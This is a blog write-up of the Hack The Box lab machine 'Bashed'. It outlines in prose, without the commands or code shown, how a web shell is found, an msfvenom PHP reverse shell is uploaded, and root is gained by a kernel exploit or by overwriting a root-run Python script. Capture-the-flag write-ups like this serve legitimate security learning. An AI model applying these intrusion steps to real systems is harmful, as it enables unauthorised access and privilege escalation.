Thursday, March 21, 2019

Bashed


BASHED

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Bashed, what is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

Bashed's IP is 10.10.10.68:

 

- Scanning with Nmap the only open port is 80:



- Scanning deeper the port 80:


- Connecting with the browser:

 


- Dirbusting:






- Checking the folder /dev we find two PHP scripts:

 

- Clicking either phpbash.php or phpbash.min.php the result is a PHP bash:

 







- Looking for more content:

 

- Good news are that Netcat is available:

 


3 - EXPLOITATION


Msfvenom helps creating an exploit called myshell.php:




- Uploading myshell.php from Kali to Bashed:


 

 


- Setting up a Meterpreter listener session:




- Running myshell.php from the browser:

 

- The exploitation is successful and we get a Meterpreter session:



- Spawning a shell and improving it:

 


4 - CAPTURING THE 1st FLAG

- Reading user.txt:

 


5 - PRIVILEGE ESCALATION

- Let's try two ways for achieving Privilege Escalation

5.1 - Exploiting the kernel

- Checking the Ubuntu release version:




Kernel exploit for this operating system:









- Copying the exploit poc.c to Kali and compiling it according to the instructions:








- Transferring the binary pwn from Kali to Bashed:




- Giving execution permissions:




- Running pwn we eventually get a remote root shell:





5.2 - Sudoer privileges

- The current user is www-data:

 

- Sudoer privileges for www-data allows to run all commands as the scriptmanager user:

 




- Listing content inside folder /scriptmanager:



- Listing content of / there is a folder called scripts:



- User www-data cannot access directly the contents of folder scripts:

 

- However www-data can use his sudoer privileges to open scripts:



- Reading test.py and test.txt:

 

 


- At this point of the exploitation process the strategy will be to replace test.py with some exploitation code, for instance:




- Transferring myexploit.py to Bashed:



- Copying myexploit.py over test.py:




- Setting a Netcat listener session on Kali's port 5555:




- After some seconds a remote root shell is successfully achieved:





6 - CAPTURING THE 2nd FLAG

- Reading root.txt: